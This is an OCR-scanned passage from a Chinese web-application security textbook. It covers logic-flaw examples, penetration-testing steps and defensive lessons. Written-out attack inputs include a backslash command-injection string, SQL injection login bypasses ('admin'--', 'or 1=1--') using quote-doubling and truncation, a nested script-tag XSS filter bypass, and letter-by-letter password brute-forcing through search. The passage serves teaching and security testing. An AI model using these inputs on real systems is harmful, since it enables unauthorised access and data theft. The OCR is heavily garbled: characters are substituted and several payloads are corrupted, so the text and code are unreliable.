(2) 发 挥 想象 ， 努 力 想 出 操纵 应 用 程序 行为 的 办 法 ， 使 应 用 程序 进行 的 调整 与 开发 者 最 初 
设 定 的 标准 相互 矛盾 。 如 前 所 述 ， 在 应 用 折扣 后 再 从 购物 车 中 取出 商品 就 是 最 典型 的 示例 。 














11.2.8 例 8: 避免 转 义 


我 们 曾 在 各 种 Web 应 用 程序 中 过 到 过 这 种 逻辑 缺陷 ， 包 括 一 于 网 络 入 侵 检测 产品 使 用 的 Web 
管理 界面 。 

1. 功能 

应 用 程序 的 设计 者 决定 执行 某 种 功能 , 该 功能 需要 以 自 变 量 的 形式 辐 操 作 系 统 命令 提交 用 户 
控制 的 输入 。 应 用 程序 的 开发 者 知道 这 种 操作 包含 着 内 在 的 风险 ( 请 参见 第 9 章 了 解 相关 内 容 )， 
并 决定 净化 用 户 输入 中 出 现 的 任何 洲 在 的 恶意 字符 ,从 而 防御 这 种 风险 。 下 面 的 字符 都 需要 使 用 
反 斜 线 (\) 进行 转 义 : 

| & < > 空格 和 换行 符 


以 这 种 方式 进行 转 义 后 ，shell 命 令 解 释 器 就 把 它们 当做 提交 给 被 记 用 命令 的 自 杰 是 的 -部 四 时 
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分 ， 而 非 shell 元 字符 。 后 者 可 用 于 注入 其 他 命令 或 和 目 变 量 、 重 定向 输出 等 。 

2. 假设 

开发 者 确信 , 他 们 设计 的 方法 可 有 效 防御 命令 注入 攻击 。 他 们 考虑 到 了 每 一 个 可 能 被 攻击 者 
利用 的 字符 ， 并 确保 对 它们 进行 了 适当 的 转 义 处 理 ， 因 而 它们 不 会 造成 风险 。 

3. 攻击 方法 

开发 者 起 记 了 对 转 义 字符 本 号 进行 转 义 。 

通 遂 , 攻击 者 在 利用 简单 的 命令 注入 漏洞 时 并 不 直接 使 用 反 斜 线 , 因此 开发 者 认为 它 并 非 恶 
意 字 符 。 然 而 ， 正 是 由 于 没有 对 它 进 行 转 义 ， 攻 击 者 就 可 以 完全 破坏 应 用 程序 的 准 化 机 制 。 

假设 攻击 者 回 易 受 攻击 的 功能 提交 以 下 输入 : 























foo\;l1s 
如 前 所 述 ， 应 用 程序 对 其 进行 适当 的 转 义 处 理 ， 因 此 攻击 者 的 输入 变 成 : 
foo\\;l1ls 





当 这 个 数据 作为 目 变 量 提交 给 操作 系统 命令 时 ，shell 解释 带 把 第 一 个 反 斜 线 作 为 转 义 字符 ， 
而 把 第 二 个 反 斜 线 当 做 字面 量 反 斜 线 处 理 ; 反 斜 线 不 是 一 个 转 义 人 字符， 而 是 目 变 量 的 一 部 分 。 然 
后 它 遇 到 分 号 字符 ,该 字符 明显 没有 进行 转 义 。 解 释 角 把 分 号 作为 一 个 命令 分 隔 符 ， 因 此 继续 执 
行 攻击 者 注入 的 命令 。 


渗透 测试 步 又 
当 在 应 用 程序 中 探查 命令 注入 及 其 他 缺陷 时 ， 尝 试 在 受 控制 的 数据 中 插入 相关 元 字符 后 ， 
接着 在 每 个 元 字符 前 插入 一 个 反 斜 线 ， 测 试 前 面 描述 的 迎 辑 缺陷 。 











注解 ”一 些 防御 跨 站 点 脚本 攻击 ( 请 参阅 第 12 章 了 解 相关 内 容 ) 的 措施 中 也 存在 这 种 
的 逻辑 缺陷 。 将 用 户 提交 的 输入 直接 复制 到 一 段 JavaScript 脚 本 的 字符 串 变 量 值 中 时 ， 
这 个 值 包含 在 引号 内 。 为 防御 跨 站 点 脚本 攻击 ， 许 多 应 用 程序 使 用 反 斜 线 对 出 现在 用 





户 输入 中 的 引号 进行 转 义 。 然 而 ， 如 果 反 斜 线 本 身 并 没有 转 义 ， 那 么 攻击 者 就 可 以 提 
交 \!'! 玻 坏人 衬 符 事 ， 从 而 控制 脚本 。 旱 先 版 本 的 Ruby On Rails 框 架 的 
escape_javasczript 函 数 中 就 存在 这 种 漏洞 。 





11.2.9 例 9: 避 开 输入 确认 


笔者 曾 在 一 个 电子 商务 站 点 的 Web 应 用 程序 中 发 现 这 种 逻辑 缺陷 。 许 多 其 他 应 用 程序 中 也 存 
在 类 似 的 缺陷 。 

1. 功能 

该 应 用 程序 包含 一 组 输入 确认 程序 ,以 防范 各 种 类 型 的 攻击 。 其 中 的 两 种 防御 机 制 为 SQL 注 
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和 人 过 滤 和 长 度 限制 。 

通 各 ,应 用 程序 对 在 基于 字符 串 的 用 户 输入 中 出 现 的 任何 单 引 号 进行 转 义 (并 拒绝 在 数字 输 
入 中 出 现 的 任何 单 引 号 )， 以 防范 SQL 注 入 。 如 第 9 章 所 述 ， 两 个 单 引 号 在 一 起 将 构成 一 个 转 义 友 
列 , 表示 一 个 原 义 单 引号 ,数据库 会 将 其 解释 为 引用 字符 串 中 的 数据 ， 而 不 是 结束 字符 串 的 终止 
符 。 因 此 ， 许 多 开发 者 认为 ,通过 将 用 户 提交 的 输入 中 的 任何 单 引 号 双 写 ， 就 可 以 防止 SQL 注 入 
攻击 。 

长 度 限 制 适用 于 所 有 输入 , 确保 用 户 提 交 的 变量 不 会 超过 128 个 字符 。 如 采 任 何 变 量 超 过 128 
个 字符 ， 它 会 将 其 截 短 。 

2. 假设 

从 安全 的 角度 来 说 ，SQL 注 入 过 滤 和 长 度 限 制 都 属于 适当 的 防御 机 制 ， 因 此 两 种 防御 机 制 都 
应 该 采用 。 

3. 攻击 方法 

SQL 注入 防御 通过 将 用 户 输入 中 的 任何 引号 配对 而 生效 ， 因 此 ， 在 每 对 引号 中 ， 第 一 个 引号 
将 作为 第 二 个 引号 的 转 义 字符 。 但 是 ， 开 发 者 并 没有 考虑 到 ， 如 果 将 经 过 转 义 的 输入 提交 给 “ 截 
短 ” 功 能 ， 将 会 发 生 什么 情况 。 

回 到 第 9 草 中 的 登录 功能 SQL 注 和 示例。 假设 应 用 程序 将 用 户 输入 中 的 任何 单 引 号 配对 ， 然 
后 对 该 数据 实施 长 度 限 制 ， 将 其 截 短 为 128 个 字符 。 如 果 提 交 以 下 用 户 和 名: 


















































Admin'—-— 

将 导致 以 下 无 法 避 开 登录 的 查询 : 
SELECT * FROM users WHERE username = 'admin''--' and password = '! 
但 是 ， 如 采 提 交 以 下 用 户 名 《包含 127 个 a 后 接 一 个 单 引 号 ): 
aaaaaaaa[... Jaaaaaaadaadaa’ 








应 用 程序 会 首先 将 单 引号 配对 ， 然 后 将 字符 串 截 短 为 128 个 字符 ， 导 致 输入 又 恢复 其 原始 值 。 这 
时 会 生成 数据 库 错误 ， 因 为 在 查询 中 注入 了 另外 一 个 单 引号 ， 而 没有 纠正 周围 的 语法 。 此 时 如 果 


提交 密码: 








or 工 = 工 -一 
应 用 程序 将 执行 以 下 查询 ， 从 而 成 功 避 开 登 录 : 


SELECT * FROM users WHEREB username = 'aaaaaaaal[...|aaaaaaaaaaa'' and 








Password = 'or 1=1-——' 
由 a 组 成 的 字符 串 末 尾 的 已 配对 引号 将 被 解释 为 转 义 引号 ， 因 而 被 作为 查询 数据 的 一 部 分 。 这 个 
字符 串 将 继续 有 效 ， 百 到 下 一 个 单 引 号 位 置 结束 ， 而 在 原始 的 查询 中 ,这 个 位 置 为 用 户 提交 的 密 
码 信 的 开始 部 分 。 这 样 ， 数 据 库 理解 的 用 户 名 为 如 下 所 示 的 字符 串 数 据 : 
aaaaaaaal[l...]Jaaaaaaaaaaa' and password = 


因此 ， 之 后 的 任何 内 容 均 被 解释 为 查询 的 一 部 分 ， 因 而 可 以 进行 专门 设计 以 破坏 碍 询 逻 辑 。 
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提示 “不必 清楚 了 解 应 用 程序 实施 的 长 度 限 制 ， 只 需 轮 流 提 交 下 面 的 两 个 长 字符 串 ， 
并 确定 是 否 会 生成 错误 ， 即 可 测试 这 种 类 型 的 漏洞 : 


and so on 
and so on 


截 短 转 义 输入 将 在 偶数 或 奇数 个 字符 之 后 发 生 。 无论 是 哪 一 种 情况 ， 以 上 其 中 一 个 字 
符 串 将 导致 在 查询 中 插入 奇数 数量 的 单 引 号 ， 从 而 生成 无 效 的 语法 。 


渗透 测试 步骤 

记 下 应 用 程序 修改 用 户 输 入 ( 特别 是 截 短 、 删 除数 据 、 编 码 或 解码 ) 的 任何 位 置 。 对 于 观 
察 到 的 每 一 个 位 置 ， 确 定 是 否 可 以 人 为 构造 恶意 字符 串 。 

(1) 如 果 数 据 已 被 过 滤 一 次 〈 非 递归 ), 确定 是 否 可 以 提交 一 个 “补偿 ”过 滤 操 作 的 字符 串 。 
例如 ， 如 果 应 用 程序 过 滤 SELECT 这 个 SQL 关键 字 ， 则 可 以 提交 SELSELECTECT ， 看 过 滤 机 制 
是 否 会 删除 其 中 的 SELECT 子 字符 串 ， 而 留 下 SELECT。 

(2) 如 果 数 据 确 认 按 设 定 的 顺序 发 生 ， 并 且 有 一 个 或 多 个 确认 步骤 修改 了 数据 ， 则 确定 是 
人 否 可 以 将 这 些 步 又 用 于 破坏 之 前 的 确认 步骤 。 例 如， 如 果 应 用 程序 执行 URL 编 码 ， 然 后 过 滤 掉 
恶意 数据 ( 如 <script> 标 签 )， 则 可 以 通过 提交 以 下 字符 串 来 避 开 确认 机 制 : 


S$<script>3cscript%<script>3ealert (1)%<script>3c/ 
script%<script>3e 

















Y 注解 ” 跨 站 点 脚本 过 滤 经 常会 错误 地 删除 HTML 标 签 对 之 间 的 所 有 数据 ， 如 


日 
、- 也 
用 





误 
<tagl>aaaaa</tag1l>。 这 种 为 通常 男 于 受到 上 述 攻击 。 


11.2.10 例 10: 滥用 搜索 功能 


我 们 曾 在 一 个 提供 基于 预订 的 金融 新 闻 和 信息 访问 的 应 用 程序 中 发 现 过 这 种 逻辑 缺陷 。 随 
后 ,我 们 又 在 两 个 完全 无 天 的 应 用 程序 中 遇 到 相同 的 漏洞 ， 这 表明 许多 逻辑 缺陷 既 难 以 捉摸， 又 
广泛 存在 。 

1. 功能 

应 用 程序 允许 用 户 访问 大 量 的 历史 档案 与 当前 信息 , 包括 公司 报表 与 账目 、 新 闻 稿 、 市 场 分 
析 等 。 大 部 分 信息 只 有 付费 用 户 才 可 查阅 。 

应 用 程序 提供 一 个 功能 强大 、 分 类 详细 的 搜索 功能 ， 所 有 用 户 都 可 使 用 这 项 功能 。 如 果 匿 名 
用 户 执 行 一 项 查询 ,搜索 功能 将 返回 所 有 与 查询 相 匹 配 的 文档 链接 。 然而 ,如 朵 用 户 想 要 查看 查 
询 返 回 的 受 保护 文档 的 实际 内 容 , 就 需要 付费 订阅 。 应 用 程序 的 所 有 者 认为 这 种 行为 是 一 种 有 用 
的 癌 销 集 略 。 

2. 假设 


应 用 程序 的 设计 者 认为 ， 如 果 用 户 不 付费 订阅 ， 就 无 法 使 用 搜索 功能 提取 任何 有 用 的 信息 。 
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搜索 结果 返回 的 文档 标题 往往 含义 模糊 ， 例 如 ,“2010 年 度 报告 "“、“ 新 闻 稿 08-03-2011” 等 。 
3. 攻击 方法 
因为 搜索 功能 指出 与 某 一 查询 匹配 的 文档 数量 , 狐 独 的 用 户 就 可 以 提交 大 量 查 询 , 并 通过 推 
断 利用 搜索 功能 提取 正常 情况 下 需要 付费 才能 查阅 的 信息 。 例如 ,下面 的 查询 可 从 一 个 受 保护 的 
文档 中 提取 内 容 。 


wahh consulting 

















>> 276 matches 

wahh consulting "Press Release 08-03-2011" merger 

>> 0 matches 

wahh consulting "Press Release 08-03-2011" Share issue 

>> 0 matches 

wahh consulting "Press Release 08-03-2011" dividend 

>> 0 matches 

wahh consulting "Press Release 08-03-2011" takeover 

>> 1 match 

wahh consulting "Press Release 08-03-2011" takeover haxors inc 

>> 0 matches 

wahh consulting "Press Release 08-03-2011" takeover uberleet ltd 
>> 0 matches 

wahh consulting "Press Release 08-03-2011" takeover script kiddy corp 
>> 0 matches 

wahh consulting "Press Release 08-03-2011" takeover ngs 

>> 1 match 

wahh consulting "Press Release 08-03-2011" takeover ngs announce 
>> 0 matches 

wahh consulting "Press Release 08-03-2011" takeover ngs cancelled 
>> 0 matches 

wahh consulting "Press Release 08-03-2011" takeover ngs completed 
>> 1 match 


虽然 用 户 不 能 查看 文档 的 具体 内 容 , 但 通过 发 挥 充分 的 想象 并 使 用 有 针对 性 的 请 求 , 他 就 能 
够 相对 浓 楚 地 了 解 文档 的 内 容 。 





提示 在 某 些 情 月 pg EE 够 以 这 种 方 式 通 过 搜索 功 EE 过 滤 信 息 心 > ， 对 应 用 程序 的 安全 非 
WU 常 重要 : 它 会 披露 大 量 与 管理 功能 、 密 码 和 采用 的 技术 有 关 的 信息 。 


”J | 提示 事实 证 明 ， 使 用 这 种 技巧 可 对 内 部 文档 管理 软件 实施 有 效 攻 击 。 笔 者 曾 采用 此 
辟 ”| 技巧 对 存储 在 维基 百科 中 的 配置 文件 内 的 关键 密码 实施 过 变 力 攻击 。 由 于 维基 百科 会 


返回 提示 , 说 明 搜 索 字 符 串 是 否 出 现在 页 面 的 任何 位 置 ( 而 不 是 匹配 整个 单词 ), 因此 ， 
可 以 通过 搜索 以 下 内 容 ， 逐 个 字母 地 对 密码 实施 变 力 攻击 : 


Password=A 


Password=B 
Password=BA 
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11.2.11 例 11: 利用 调试 消息 


我 们 曾 在 一 家 金融 服务 公司 使 用 的 Web 应 用 程序 中 发 现 过 这 种 轩 辑 缺陷 。 

1. 功能 

该 应 用 程序 最 近 才 开发 出 来 , 像 许 多 新 软件 一 样 ， 其 中 包含 大 量 与 功能 有 关 的 缺陷。 每 隔 一 
段 时 间 ， 应 用 程序 的 各 种 操作 就 会 意外 中 断 ， 并 回 用 户 返回 一 条 错误 消息 。 

为 方便 错误 调查 ， 开 发 者 决定 在 这 些 消 息 中 提供 详尽 的 信息 ， 包 括 : 

口 用 户 的 身份 ; 

口 当前 会 话 的 令 牌 ; 

口 被 访问 的 URL; 

口 在 造成 错误 的 请 求 中 提交 的 所 有 参数 。 

提供 这 些 消息 对 服务 台 工 作 人 员 调 查 并 恢复 系统 故障 非常 有 用 , 而 且 有 助 于 消除 剩 下 的 功能 
缺陷 。 

2. 假设 

尽管 安全 顾问 经 党 提出 警告 ， 称 这 种 详尽 的 调试 消息 可 能 会 被 攻击 者 滥用 , 但 开发 者 仍然 认 
为 它们 不 会 造成 任何 安全 漏洞 。 通 过 检查 浏览 硕 处 理 的 请 求 与 啊 应 , 用 户 就 有 可 能 获得 调试 消息 
中 包含 的 所 有 人 信息。 但是， 这 些 消息 中 并 未 包含 与 实际 故障 有 关 的 任何 细节 〈 如 栈 跟 踪 )， 因 此 
无 法 大 助攻 击 者 回应 用 程序 发 动 有 歼 攻 击 。 

3. 攻击 方法 

位 管 开发 者 对 调试 消息 的 内 容 进行 了 合理 保护 ， 但 由 于 他 们 在 创建 调试 消息 时 犯 下 的 错误 ， 
假设 仍然 存在 缺陷 。 

当 错 误 发 生 时 ,应 用 程序 的 一 个 组 件 将 收集 所 有 必要 的 信息 ,并 将 其 保存 起 来 。 用 户 收 到 一 
个 HTTP 重 定 回 ， 它 指 回 一 个 显示 这 些 被 保存 信息 的 URL。 问 题 在 于 ,在 应 用 程序 保存 调试 信息 、 
用 户 访 问 错误 消息 时 ， 并 没有 使 用 会 话 。 相 反 ， 调 试 信息 被 保存 在 一 个 静态 容器 内 ， 并 有 旦 错误 消 
息 URL 总 显示 最 后 放 入 这 个 容 兹 的 信息 。 因 此 ,开发 者 认为 , 使 用 重 定 问 的 用 户 只 会 看 到 与 错误 
有 关 的 调试 信息 。 

实际 上 , 在 这 种 情况 下 ,如果 两 个 错误 几乎 同时 发 生 , 普通 用 户 偶 尔 会 看 到 与 男 一 名 用 户 造 
成 的 错误 有 关 的 调试 信息 。 除 线程 安全 问题 外 ( 见 下 一 个 示例 )， 这 并 非 一 个 简单 的 竞 态 条 件 。 
如 果 攻 击 者 知道 错误 机 制 的 工作 原理 ， 他 就 可 以 重复 访问 消息 URL， 并 记录 下 所 有 不 同 的 错误 
消息 。 只 需 短 短 几 个 小 时 ， 他 就 可 以 获得 大 量 应 用 程序 用 户 的 敏感 数据 : 

口 一 组 可 用 在 密码 猜测 攻击 中 的 用 户 名 ; 

口 一 组 可 用 于 支持 会 话 的 会 话 令 有 牌 ; 

口 一 组 用 户 提 交 的 输入 ， 其 中 包含 密码 和 其 他 敏感 数据 。 

因此 , 错误 机 制 可 能 会 造成 严重 的 安全 威胁 。 由 于 管理 用 户 有 时 会 收 到 这 类 内 容 详细 的 错误 
消息 ， 监 控 错 误 消 息 的 攻击 者 就 可 以 迅速 获得 足够 的 信息 ， 从 而 攻破 整个 应 用 程序 。 
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渗透 测试 步 又 


(1) 为 探查 这 种 缺陷 ， 首 先 列 出 应 用 程序 中 可 能 出 现 的 反常 事件 和 条 件 ， 以 及 以 非常 规 方 

















却 回 浏览 船 返 回 有 用 的 用 户 信息 的 情况 ， 如 返回 调试 错误 消息 。 
(2) 同时 以 两 名 用 户 的 名 义 使 用 应 用 程序 , 使 用 一 名 或 两 名 用 户 系统 性 地 创造 每 一 个 条 件 ， 
并 确定 为 一 名 用 户 是 否 受 到 影响 。 








11.2.12 例 12: 与 登录 机 制 竞赛 


最 近 ， 这 种 逻辑 缺陷 给 几 个 大 型 应 用 程序 造成 了 严重 威胁 。 

1. 功能 

应 用 程序 执行 采用 一 种 安全 、 多 阶段 的 登录 机 制 ， 要求 用 户 提交 几 个 不 同 的 证 书 才能 获得 访 
问 权 限 。 

2. 假设 

验证 机 制 接受 了 大 量 设 计 审 查 与 渗透 测试 。 应 用 程序 的 所 有 者 确信 , 攻击 者 无 法 回 验 证 机 制 
发 动 有 效 攻 击 ， 从 而 获得 未 授权 访问 。 

3. 攻击 方法 

实际 上 ， 验 证 机 制 存在 一 个 细小 的 缺陷 。 有 时 ， 顺 客 登 录 后 ， 他 可 以 访问 男 外 一 名 用 户 的 账 
户 , 查看 该 用 户 的 所 有 金融 信息 ,甚至 使 用 其 他 用 户 的 账户 进行 支付 。 最初， 应 用 程序 的 行为 完 
全 是 随机 性 的 : 在 获得 末 授 权 访 问 之 前 ,用户 并 没有 执行 任何 非法 操作 ; 再 次 登录 时 ,反常 现象 
也 不 会 重复 出 现 。 

经 过 一 些 调查 ， 银 行 发 现 ， 如 采 两 个 不 同 的 用 户 在 同一 时 间 登 录 ， 驳 会 出 现 销 误 。 而 且 ， 并 
不 是 每 次 出 现 这 种 情况 都 会 发 生 错 误 ( 仪 在 少数 情况 下 错误 才 会 发 生 )。 发 生 这 种 错误 的 根本 原 
因 在 于 , 应 用 程序 将 与 新 近 通 过 验证 的 用 户 有 关 的 标识 符 临 时 保存 在 一 个 静态 ( 非 会 话 ) 变 量 中 。 
改 与 这 个 值 不 久 后 ,应 用 程序 再 读 取 这 个 变量 的 值 。 如 果 在 这 个 过 程 中 有 男 外 一 个 线程 ( 人 处理 男 
一 个 登录 ) 写 人 到 变量 中 ,早先 登录 的 用 户 就 会 分 配 到 属于 随后 登录 的 用 户 的 会 话 。 

这 种 漏洞 源 于 与 前 面 错误 消息 示例 中 相同 的 错误 : 应 用 程序 使 用 静态 存储 保存 应 根据 独立 线 
程 或 会 话 保 存 的 信息 。 然 而， 由 于 这 类 错误 不 会 反复 出 现 ， 当 前 示例 中 的 缺陷 更 难 发 现 ， 也 更 难 
对 其 加 以 利用 。 

这 种 缺陷 叫做 “ 竞 态 条 件 ”， 因 为 其 中 的 漏洞 仅 在 某 些 特殊 情况 下 才 会 出 现 ， 而 且 存 在 时 间 
很 短 。 由 于 漏洞 仅 在 短 时 间 内 存在 ， 攻 击 者 面临 着 一 次 “竞赛 ” ， 必 须 赶 在 应 用 程序 关闭 它 之 前 
对 其 加 以 利用 。 如 果 攻 击 者 是 应 用 程序 的 本 地 用 户 ， 他 就 有 可 能 知道 竞 态 条 件 出 现 的 具体 情景 ， 
并 在 有 效 的 时 间 内 利用 漏洞 。 如 有 果 攻 击 者 属于 远程 用 户 ， 要 想 实 施 攻 击 束 比较 困难 。 

如 条 远程 攻击 者 了 解 到 这 种 漏洞 的 本 质 , 那么 他 就 可 以 通过 使 用 一 段 脚 本 连续 进行 登录 , 并 
查看 被 访问 账户 的 详细 资料 ， 从 而 设计 出 有 效 的 攻击 方法 。 但 是 , 由 于 这 种 漏洞 可 被 利用 的 时 间 
极 短 ， 攻 击 者 可 能 需要 提交 数目 庞大 的 请 求 。 
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鉴于 以 上 原因 , 我 们 在 正常 渗透 测试 过 程 中 没有 发 现 范 态 条 件 也 就 不 足 为 怪 了 。 只 有 当 应 用 
程序 的 用 户 数量 足够 庞大 、 可 导致 反 笛 现 迪 (由 顾客 上 报 ) 发 生 时 ， 这 种 条 件 才 会 出 现 。 然 而 ， 
如 果 对 验证 与 会 话 管理 逻辑 进行 严格 的 代码 审查 ， 还 是 有 可 能 发 现 此 类 问题 。 











渗透 测试 步 又 
进行 远程 “ 黑 盒 测试 ”查找 这 类 细微 的 线程 安全 问题 非常 麻烦 ， 应 被 视 为 一 项 专门 任务 ， 








只 有 极其 注重 安全 的 应 用 程序 才 需 要 进行 这 种 测试 。 

(1) 针对 选择 的 关键 功能 进行 测试 ， 如 登录 机 制 、 密 码 修改 功能 与 转账 过 程 。 

(2) 对 每 一 项 测试 的 功能 , 确定 东 位 用 户 在 执行 一 项 操作 时 需要 提交 一 个 或 少数 几 个 请 求 。 
同时 ， 找 到 确定 操作 结果 的 最 容 单 方法 ,例如 ,核实 用 户 登 录 后 是 否 能 够 查看 他 们 目 己 的 账户 
于 县 。 

(3) 使 用 几 台 高 规格 的 机 顶 ， 从 不 同 的 网 络 位 置 访问 应 用 程序 ， 写 出 一 段 攻击 脚本 ， 代 表 
几 和 名 不 同 的 用 户 反 复 执行 相同 的 操作 。 确 定 每 项 操作 是 否 达 到 预期 的 结果 。 

(4) 为 接收 大 量 错误 警报 做 好 准备 。 根 据 为 应 用 程序 提供 文 持 的 基础 恕 构 的 规模 ， 可 能 需 


要 对 安 冯 的 软件 进行 负载 测试 。 有 时 ， 反 和 现象 可 能 与 安全 无 关 。 























11.3 ”避免 逻辑 缺陷 
就 像 无 法 通过 明确 的 特征 确定 Web 应 用 程序 中 存在 的 逻辑 缺陷 一 样 , 同样 也 没有 能 够 保护 应 

用 程序 的 万 能 防御 措施 。 例 如 ， 虽 然 无 法 找到 安全 的 方法 替代 危险 的 API,， 但 是 ,下 面 的 一 系列 

最 佳 实践 可 显著 降低 在 应 用 程序 中 出 现 逻 辑 缺 陷 造 成 的 风险 。 

口 确保 将 应 用 程序 各 方面 的 设计 信息 清楚 、 详 细 地 记录 在 文档 中 ， 以 方便 其 他 人 了 解 设计 
者 做 出 的 每 个 假设 。 同 时 将 所 有 这 些 假设 明确 记录 在 设计 文档 中 。 
口 要 求 所 有 源 代码 提供 清楚 的 注释 ， 包 括 以 下 信息 : 

每 个 代码 组 件 的 用 途 和 预计 用 法 ; 

四 每 个 组 件 对 它 无 法 直接 欣 制 的 内 容 做 出 的 假设 ; 

四 利用 组 件 的 所 有 客户 端 代 码 引 用 ， 清 楚 记 录 它 的 效果 有 助 于 阻止 在 线 注册 功能 中 的 逻 
辑 缺 陷 。( 注意 : 这 里 的 “客户 内” 不 是 指 客 户 端 一 服务 天 关系 中 的 用 户 ， 而 是 指 组 件 
主要 依赖 的 代码 。) 

D 在 以 安全 为 中 心 的 应 用 程序 设计 审核 中 ,考虑 在 设计 过 程 中 做 出 的 每 一 个 假设 ， 并 想象 
假设 被 违背 的 每 种 情况 。 尤 其 应 注意 任何 应 用 程序 用 户 可 完全 控制 的 假定 条 件 。 

D 在 以 安全 为 中 心 的 代码 审查 中 ， 从 各 个 角度 考虑 以 下 两 个 因素 : 应 用 程序 如 何 处 理 用 户 
的 反常 行为 和 输入 ; 不 同 代码 组 件 与 应 用 程序 功能 之 间 的 相互 依赖 和 互 操 作 可 能 造成 的 
不 利 影 啊 。 

我 们 可 从 本 章 描述 的 特殊 逻辑 缺陷 实例 中 汲取 以 下 教训 。 

口 始终 记 住 ， 用 户 可 以 控制 请 求 每 一 个 方面 的 内 容 ( 请 参阅 第 1 章 了 解 相 关内 容 )。 他 们 可 
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以 按 任何 顺序 访问 多 阶段 功能 ; 他 们 可 以 提交 应 用 程序 并 未 要 求 的 参数 ; 他 们 可 以 完全 
省 略 某 些 参数 ， 而 不 仅仅 是 算 改 参数 值 。 

口 根据 会 话 确定 用 户 的 吴 份 与 权限 〈 请 参阅 第 8 章 了 解 相 关内 容 )。 不 要 根据 请 求 的 任何 其 
他 特性 对 用 户 的 权限 做 出 任何 假设 。 

口 当 根 据 用 户 提交 的 数据 或 者 用 户 执 行 的 操作 更 新 会 话 数据 时 ， 仔 细 考 虑 更 新 后 的 数据 可 
能 会 给 应 用 程序 的 其 他 功能 造成 什么 影响 。 注 意 ， 这 些 数据 可 能 会 给 由 其 他 程序 员 或 其 
他 开发 团队 编写 的 完全 无 天 的 功能 造成 意 想 不 到 的 不 利 影 啊 。 

口 如 有 果 一 项 搜索 功能 可 用 于 查询 禁止 某 些 用 户 访问 的 敏感 数据 ， 确 保 那些 用 户 无 法 利用 该 
项 功能 、 根 据 搜 索 结果 推断 出 有 用 的 信息 。 如 果 可 以 ,根据 不 同 的 用 户 权 限 保 留 几 个 搜 
索索 引 ( search index )， 或 者 使 用 当前 用 户 的 权限 进行 动态 信息 搜索 。 

口 如 果 一 项 功能 允许 用 户 从 审计 追踪 中 删除 任何 记录 ， 在 使 用 该 项 功能 时 应 特别 小 心 。 田 
外 ， 在 大 量 使 用 审计 的 应 用 程序 与 双重 授权 模型 中 ， 考 虑 一 名 高 级 权限 用 户 创 建 为 一 个 
相同 权限 的 用 户 可 能 造成 的 影 啊 。 

口 如 采 应 用 程序 根据 数字 交易 限额 执行 检查 ， 在 处 理 用 户 输入 前 ， 必 须 对 所 有 数据 实施 严 
格 的 规范 化 与 数据 确认 。 如 果 没 有 考虑 到 使 用 负数 的 情况 ， 应 立即 拒绝 包含 负数 的 请 求 。 

口 如 有 果 应 用 程序 根据 订购 商品 的 数量 决定 折扣 ， 必 须 保证 在 实际 应 用 折扣 前 确定 订单 。 

口 如 果 在 将 用 尸 提交 的 数据 提交 给 可 能 易于 受到 攻击 的 应 用 程序 组 件 前 ， 对 其 进行 转 义 处 
理 , 一 定 要 记得 对 转 义 字符 本 里 进行 转 义 ,否则 整个 确认 机 制 可 能 会 遭 到 破坏 。 

口 始终 使 用 适当 的 存储 方法 保存 与 某 位 用 户 有 关 的 数据 (或 者 保存 在 会 话 中 ， 或 者 保存 在 
用 户 资 料 中 )。 
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当 攻 击 应 用 程序 的 逻辑 缺陷 时 , 渗透 测试 员 既 要 进行 系统 性 地 探查 , 也 要 从 不 同 的 角度 思考 
问题 。 如 前 所 述 , 渗透 测试 员 应 该 始终 执行 各 种 关键 检查 以 确定 应 用 程序 在 收 到 反常 输入 后 的 行 
为 。 这 类 反常 输入 包括 从 请 求 中 删除 参数 、 使 用 强制 浏览 不 按 预定 顺序 访问 功能 ， 以 及 回应 用 程 
序 的 不 同位 置 提 交 参 数 。 通 常 ,应 用 程序 啊 应 这 些 操作 的 方式 会 反应 出 一 些 存在 缺陷 的 假设 ,不 
做 这 些 假设 就 可 以 避免 造成 不 良 后 果 。 

除了 这 些 基本 的 测试 外 , 在 探查 逻辑 缺陷 时 面临 的 最 大 挑战 , 是 如 何 深 人 了解 开发 者 的 思维 
方式 。 需 要 了 解 他 们 想 要 达到 什么 目的 、 可 能 会 做 出 什么 假设 、 可 能 采用 哪些 捷径 、 将 会 犯 下 什 
么 错误 。 想象 一 下 ,假设 完工 的 最 后 期 限 临 近 , 但 还 主要 担心 功能 而 非 安 全 ,试图 在 现 有 代码 中 
增加 一 项 新 功能 ， 或 者 需要 使 用 其 他 人 编写 的 质量 不 佳 的 API。 在 那样 的 情 次 下 ， 开 发 者 可 能 会 
犯 什 么 错误 ? 如 何 利 用 这 些 错误 ? 




















11.5 ”问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec.net/wahh。 

(1) 何 为 强制 浏览 ?可 以 通过 它 确定 哪些 漏洞 ? 

(2) 为 防止 不 同类 型 的 攻击 ， 应 用 程序 对 用 户 输入 实施 各 种 全 局 过 小 。 为 防止 SQL 注 人, 它 
将 出 现在 用 户 输 入 中 的 单 引号 配对 。 为 防止 针对 一 些 本 地 代码 组 件 的 缓冲 区 溢出 攻击 , 它 将 超 长 
的 数据 规 短 到 适当 的 长 度 。 这 些 过 滤 有 什么 问题 ? 

(3) 可 以 采取 哪些 步骤 来 探查 某 登 录 功 能 中 是 否 存在 故障 开放 条 件 ? 〈 列 出 想到 的 各 种 不 同 
的 测试 。) 

(4) 某 银 行 应 用 程序 采用 一 种 非常 安全 可 靠 的 多 阶段 登录 机 制 。 在 第 一 个 阶段 ， 用 户 输入 用 
户 名 和 密码 。 在 第 二 个 阶段 , 用 户 输入 在 物理 令 牌 上 显示 的 一 个 不 断 变化 的 但 ,并 通过 一 个 隐藏 
表单 字段 重新 提 区 前 面 输入 的 用 户 名 。 

可 以 立即 发 现 的 逻辑 缺陷 有 哪些 ? 

(5) 在 通过 提交 专门 设计 的 输入 探查 一 个 应 用 程序 中 是 否 存 在 常见 的 漏洞 时 ， 应 用 程序 频繁 
返回 包含 调试 信息 的 详细 错误 消息 。 有 时 ， 这 些 消息 与 其 他 用 户 造 成 的 错误 有 关 。 这 种 情况 后 ， 
就 无 法 令 其 再 次 发 生 。 这 表示 应 用 程序 存在 什么 逻辑 缺陷 ， 接 下 来 该 如 何 处 理 ? 





















































攻击 其 他 用 户 





绝 大 多 数 针 对 Web 应 用 程序 的 攻击 主要 以 服务 需 端 应 用 程序 为 攻击 目标 。 当 然 ， 许 多 这 
类 攻击 会 侵害 到 其 他 用 户 ， 例 如 ， 盗 历 其 他 用 户 数据 的 SQL 注入 攻击 。 但 是 ， 攻 击 者 
